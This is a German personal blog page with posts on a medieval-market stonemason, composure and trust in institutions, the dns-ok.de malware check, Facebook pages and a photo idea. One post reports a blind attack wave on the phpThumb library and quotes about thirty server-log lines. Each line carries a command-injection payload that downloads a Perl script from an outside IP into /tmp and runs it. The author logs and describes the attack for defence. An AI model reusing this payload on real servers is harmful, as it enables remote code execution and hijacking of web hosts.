JanMartin.de

Fotoserie: Steinmetz auf dem Mittelaltermarkt Jena

Jan Martin Keil — Sat, 21 Jan 2012 17:58:20 +0000

Neben Carpe Noctem und Viesemattente gab es auf dem Mittelaltermarkt natürlich noch zahlreiche Handwerks-Stände. Eine Steinmetzin durfte ich etwas länger bei der Arbeit beobachten und fotografieren. Trotz schwierigem Licht wenigstens ein paar brauchbare Bilder entstanden. Notiz an mich: Handwerker bei Tageslicht fotografieren.

Gelassenheit und Vertrauen

Jan Martin Keil — Sat, 21 Jan 2012 12:40:44 +0000

Gelassenheit – ein großes Wort. Ich will nicht für mich in Anspruch nehmen, vollends erfasst zu haben, was es bedeutet. Aber ich weiß, dass sie uns gut tut. Oder tun würde, sofern wir sie für uns in Anspruch nehmen würden. Ich denke, die Gelassenheit ist es, die weise Menschen von der Masse abhebt. Ich muss mich bei diesem Wort unweigerlich an ein Interview mit Altkanzler Helmut Schmidt (ARD, 14.12.2010) erinnern, in dem er immer wieder Fragen mit einem schlichten Satz abwehrt: “Das ist Alltagspolitik, dazu äußere ich mich nicht.” Es ist sicherlich ein Luxus des Alters, nicht mehr zu Allem eine Meinung äußern zu müssen. Dieser Satz hat mir aber gezeigt, die Augen für das Große und Ganze zu öffnen und das tägliche Hin und Her nicht immer auf die Goldwage zu legen. Es ist nicht nötig der Erste zu sein, der sich über irgendetwas das Maul zerreißt. Genauso wenig wie es nötig ist, innerhalb von wenigen Stunden Demonstrationen aus dem Boden zu stampfen oder in jeder Kleinigkeit Feindseligkeiten zu vermuten. Ich will damit nicht zu Gleichgültigkeit ermutigen. Missstände müssen natürlich benannt werden und Demokratie und Recht muss durch Wachsamkeit sowohl gegenüber entgegenstehende Ideologien als auch überprivilegierte Staatsorgane gewahrt werden. Allerdings neigen wir, beflügelt durch Facebook und Twitter, zu Aktionismus und voreiligen Urteilen.

Jüngstes Beispiel ist wohl die Reaktion auf die Webseite dns-ok.de. Die ganze Sache an sich ist bedeutungslos, offenbart aber ein tief greifendes Problem: Ein Mangel an Vertrauen. Es ist erschreckend zu lesen, was für haltlose Mutmaßungen im Internet dazu kursieren, in denen Behörden abstruse Dinge unterstellt werden. Genau dieses Problem hat auch Gesine Schwan in einem kürzlich im Deutschland Radio ausgestrahlten Interview angesprochen. So hat die Politik viel Vertrauen verloren, da sie entscheidet ohne alle Fakten zu kennen. Doch können die Politiker nicht besser sein, als das Volk, aus dem sie gewählt wurden. Dieses aber erweist sich ebenfalls als nicht Vertrauenswürdig, da es nur mault und jammert, so Gesine Schwan. In diese Maulen und Jammern würde ich das Lustig machen im Web über vermeintlich inkompetente Politiker und Behörden und das Aufregen über schwer nachvollziehbare Entscheidungen einbeziehen. Ich kann mich selber davon nicht ausnehmen. Meckern ist durch Facebook noch einmal um einiges leichter geworden. Ein Like genügt, die Fakten werden jedoch kaum überprüft. Sogar zur Anwesenheit bei einer Demo habe ich mich einmal hinreisen lassen. Später, als mehr Details bekannt wurden und ich mir ein umfassenderes Bild der Sachlage machen konnte, musste ich mich ein wenig dafür Schämen. Immerhin konnte ich mir im Nachhinein das Bild noch zurecht rücken, andernfalls wäre mein Misstrauen gegenüber dem Staat ein deutliches Stück gewachsen. Umgekehrt entsteht das Problem, dass solche Aktionen von Politikern nicht mehr wirklich ernst zu nehmen sind, wenn die Beteiligten noch überhaupt keinen Überblick über die Fakten haben. Wir drehen uns also im Kreis und entfernen uns immer mehr voneinander. Schuld daran sind beide Seiten.

Aus diesem Kreislauf auszubrechen sollte also ein Ziel sein. Ein Mitglied der Piratenpartei (Stephan Urbach) macht gerade vor wie das geht. Er trifft sich zum Beispiel mit Karl Theodor zu Guttenberg, der (unter lautem Protest aus dem Internet) zum Berater für die “no-disconnect”-Strategie der EU benannt wurde. Für dieses Treffen wird Stephan Urbach im Netz zum Teil heftig kritisiert. Das gehört in die Kategorie Maulen und Jammern, denn durch Kommunikation und Zusammenarbeit werden sinnvolle Lösungen herbeigeführt. Das weiß ich nicht zuletzt durch meine Erfahrung aus zwei Jahren als Fachschaftsrat. Dafür ist jedoch ein Grundmaß an Vertrauen und Gelassenheit nötig. Etwas provokanter Formuliert es Klaus Peukert in seinem Blog-Post “We have to educate!”. Die Kommentare darunter zeigen allerdings, dass es keine einfache Lektion ist.

Mich selber sehe ich längst noch nicht am Ende dieses Lernprozesses angekommen, das möchte ich hier noch einmal betonen. Dieser Artikel dient in erster Linie dazu mir meines eigenen Standpunktes klar und vielleicht auch hinterfragt zu werden. Auch stellt sich die Frage, ob dieser Artikel nicht Maulen auf der Metaebene ist. Auf jeden Fall möchte ich dazu Anregen sich die Wirkungsweise von Meldungen auf Menschen bewusst zu machen und so persönlich dem Sog von Medien und Community zu entkommen. Man verpasst nicht, wenn man nicht sofort auf den Zug der Meinungsmacher aufspringt. Wer wartet, bis die Fakten auf dem Tisch liegen hat immer noch Zeit zum kritisieren, sofern die Sache wichtig genug war, um einen halbe Woche später überhaupt noch darüber zu reden. So kann man bedeutungslose Kleinigkeiten mit Gelassenheit übergehen und bleibt beim Wesentlichen.

DNS-OK! Weltbild auch?

Jan Martin Keil — Thu, 12 Jan 2012 12:29:30 +0000

Es geht durch alle Medien: Eine Hackergruppe, die mindestens 33000 deutsche PCs mit einem Trojaner infiziert hat, wurde festgenommen. Der Trojaner hat die DNS-Anfragen auf einen eigenen DNS-Server umgeleitete, so dass manipuliert werden konnte, welche Seiten aufgerufen werden und dies wiederum möglichst gewinnbringend genutzt. Jetzt wird dazu aufgerufen die Webseite dns-ok.de zu besuchen, um zu überprüfen, ob der eigene Rechner infiziert ist. Die ganze Aktion geht von BSI, BKA und Telekom aus.

Wie funktioniert der Test? Für die Webseite liefert der fragliche DNS-Server eine manipulierte IP-Adresse zurück. Während nicht betroffene Nutzer auf die IP-Adresse 85.214.11.195 weitergeleitet werden und dort eine Entwarnung erhalten, bekommen Nutzer die von dem Virus betroffen sind (oder sich 85.255.113.90 als DNS-Server eingetragen haben) die IP-Adresse 85.214.11.194. Dort gibt es dann die Warnmeldung. Auch wenn viele Spekulationen dieser Art kursieren, so wird doch kein Testscript ausgeführt oder sonst irgendwie auf den Rechner zugegriffen.

Vermutlich ist für die Webseite einfach ein manipuliertet Eintrag in dem fraglichen DNS-Server platziert worden, so dass Betroffene auf eine Seite mit Warnung geleitet werden, alle anderen auf eine Seite mit Entwarnung gelangen. Es wird zumindest nicht irgendwie auf den Rechner zugegriffen.

Warum erzähle ich das alles? Wenn ich die Kommentare zu der diesbezüglichen Meldung der Piratenpartei auf Facebook oder an vielen anderen Orten (einfach mal nach “dns ok” suchen) lese drängt sich mir die Frage auf, ob ich zu naiv oder einige der Kommentatoren (in welchem Verhältnis diese zur Piratenpartei stehen kann ich nicht sagen) ein wenig paranoid sind? So wird unterstellt, dass dadurch womöglich neue Geheimdiensttrojaner installiert werden, eine Datenbank mit Browserkennungen angelegt werden soll oder das ganze ein billiger Werbegag von BSI, BKA und Telekom ist. Außerdem wird den besagten auf vielfältigste weise Inkompetenz in diesem konkreten Fall vorgeworfen: Man hätte erstens viel früher was machen sollen, zweitens wäre die Methode des Tests bei dieser Angriffsart Schwachsinn und solle drittens nicht mit einem Aktivwerden der Nutzer rechnen.

Ich mit meinem möglicherweise äußerst naiven Weltbild denke es geht bei der Aktion lediglich darum 33000 Nutzer davor zu bewahren plötzlich nichts mehr im Browser angezeigt zu bekommen. Die ganze Aktion mutet etwas dramatisch an, da die Mithilfe der Medien benötigt wird und diese sich natürlich gerne auf so eine Geschichte stürzen um damit ein bisschen Angst vor bösen Hackern zu schüren, so dass die Sache dramatischer klingt als sie ist. Aber wie sonst sollte der Durchschnittsverbraucher von der Testseite erfahren? Man hätte natürlich die Nutzer auf eine Informationsseite zwingen können, die technischen Voraussetzungen dafür hat die Hackergruppe ja freundlicherweise zur Verfügung gestellt. Oder den Server abschalten und viele Nutzer kurzzeitig vom Internet abtrenne. Doch den Aufschrei nach so einer Aktion hätte ich hören wollen: “BKA manipuliert Seitenzugriffe” bzw. “BKA kappt Internetverbindung von 33000 Nutzern” oder so ähnlich. Insofern ist diese Methode, unter gesellschaftlichen Aspekten betrachtet, gut gewählt. Aber auch technisch gibt es nichts auszusetzen. Spontan dachte ich ebenfalls, dass es keinen Sinn macht eine Testseite gegen einen Trojaner mit DNS-Umleitung zu schalten, da einfach auf eine gefälschte Testseite umgelenkt werden kann. Allerdings ist der DNS-Server inzwischen unter behördliche Kontrolle, so dass diese Gefahr nicht mehr besteht. Andererseits liegt darin auch der Grund, weshalb erst jetzt -nach der Festnahme der Hackergruppe- diese Aktion gestartet wird. Und mal ganz ehrlich: Für die Virenfreiheit des eigenen Rechners ist man selber verantwortlich. Es wäre lächerlich, wenn wegen jedem zweiten Trojaner, der gerade im Umlauf ist, solch ein riesiger Aufstand gemacht werden würde.

Also: Immer mit der Ruhe. Weder durch diesen Trojaner noch durch die Gegenmaßnahmen wird die Welt untergehen.

“Wir sind jetzt auf Facebook …”

Jan Martin Keil — Tue, 03 Jan 2012 11:06:38 +0000

“Wir müssen auf Facebook.” – “Ich bin nicht auf Facebook.” – “Egal, ich melde uns mal an.”

So ungefähr stelle ich mir den Entschluss zahlreicher Organisationen jedweder Art vor, bei dem allgemeinen Facebook-Trend mitzumachen, für alles und jeden eine Facebook-Seite einzurichten. Ich finde diesen Kommunikationsweg sehr praktisch – wenn er denn richtig genutzt wird. Doch hier verbirgt sich die Falle. Die Plattform wird genutzt bevor verstanden wurde, wie sie funktioniert. Nur so kann ich mir zahlreiche “Personen” erklären, die eigentlich “Seiten” sein müssten. Dabei gibt es sowohl für Organisation als auch Nutzer immense Vorteile einer Seite:

einfachere Administration durch mehrere Personen
Zugriffsstatistiken
mit Webseite verknüpfbar
kein Freundschaftsanfragen Bestätigen
Nutzer-Privatsphäre aufrecht erhalten
Integration im Nutzerprofil und nicht in der Freundeliste
Werbung auf Facebook schalten möglich
sinnvollere Profil-Felder
als Ortsangabe nutzbar (in Statusnachrichten)
…

Die Liste ließe sich sicher noch länger fortsetzen. Doch wie so oft Kostet ein Fehler umso mehr, je später er behoben wird. Sind erstmal die ersten 50 “Freunde” zusammen steigt die Hemmschwelle auf eine Seite umzusteigen. Genau in diesem Moment wird der zweite Fehler begangen. Je länger man wartet umso schwieriger wird der Umstieg. Die Folge: Nutzeraccounts mit mehreren Tausend Freunden werden nach wie vor als “Seiten” missbraucht. Die armen Praktikanten und Aushilfen, die diese ganzen Freundschaftsanfragen bestätigen müssen.

Doch wie kann man das Vermeiden? Wo kann man lernen wie Facebook funktioniert, bevor man sich anmeldet? Ein Opfer dieses Anfängerfehlers beschwerte sich bei mir mal, dass es auf der Facebook-Startseite keinen Butten wie etwa “Leitfaden für Firmen” gibt. Das ist leider richtig und auch der Link “Erstelle eine Seite für eine Berühmtheit, eine Band oder ein Unternehmen.” ist unter dem dicken Formular leicht zu übersehen, zumal dort nichts erklärt wird. Zu den nötigen Informationen braucht es 3 gezielte Klicks von der Startseite über die Hilfe bis zur Seite Facebook für Unternehmen. Leicht zu finden ist das nicht.

Fotoidee: Back to the future

Jan Martin Keil — Wed, 28 Dec 2011 17:26:36 +0000

Eine ziemlich coole Fotoidee, die mit etwas Geduld für jeden zu realisieren sein sollte, habe ich vor kurzem über Facebook geteilt bekommen. Die Fotografin Irina Werning hat ihrem Projekt den Namen Back to the future gegeben. Das trifft es ziemlich gut, denn es werden (meist Kinder-)Bilder viele Jahre später so genau wie möglich nachgestellt. Angefangen bei der Kleidung und dem Hintergrund über Requisiten bis hin zur Körperhaltung und dem Gesichtsausdruck. Das steht auf jeden Fall auf der Liste von Fotoideen, die ich auch mal umsetzen möchte.

Weitere blinde Angriffswelle auf Webseiten

Jan Martin Keil — Wed, 28 Dec 2011 12:55:12 +0000

Wie schon vor ein paar Tagen ist erneut eine Angriffswelle in den Logfiles aufgetaucht. Das Muster dabei ist ähnlich: Blindes Testen auf bekannte Schwachstellen in verbreiteter Webseiten-Software. Diesmal konzentrieren sich die Angriffe offenbar auf eine Schwachstelle in einer PHP-Bibliothek namens “phpThumb“, deren aktuellste Version aus dem Jahr 2009 stammt, aber offenbar in diversen PHP-Systemen genutzt wird oder wurde. Diesmal ist WordPress in sofern betroffen, als dass offenbar ein paar Themes (wp-max, fama, victore, Comfy, redcarpet, comfy-plus, max) und Plugins (com-resize, ione-core) die Bibliothek verwend(et)en.

94.23.42.121 – - [28/Dec/2011:03:54:09 +0100] “GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:10 +0100] “GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:11 +0100] “GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:11 +0100] “GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:12 +0100] “GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:13 +0100] “GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:13 +0100] “GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:14 +0100] “GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:15 +0100] “GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:16 +0100] “GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:17 +0100] “GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:17 +0100] “GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:18 +0100] “GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:18 +0100] “GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:19 +0100] “GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:19 +0100] “GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:20 +0100] “GET /modules/phpThumb/phpThumb.php?src=phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:20 +0100] “GET /lib/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:21 +0100] “GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:21 +0100] “GET /thumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:22 +0100] “GET /global/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:22 +0100] “GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:23 +0100] “GET /components/com_hotornot2/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:23 +0100] “GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:24 +0100] “GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:24 +0100] “GET /staticfiles/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:25 +0100] “GET /content/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:25 +0100] “GET /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:26 +0100] “GET /admin/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:26 +0100] “GET /phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:27 +0100] “GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:27 +0100] “GET /assets/components/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
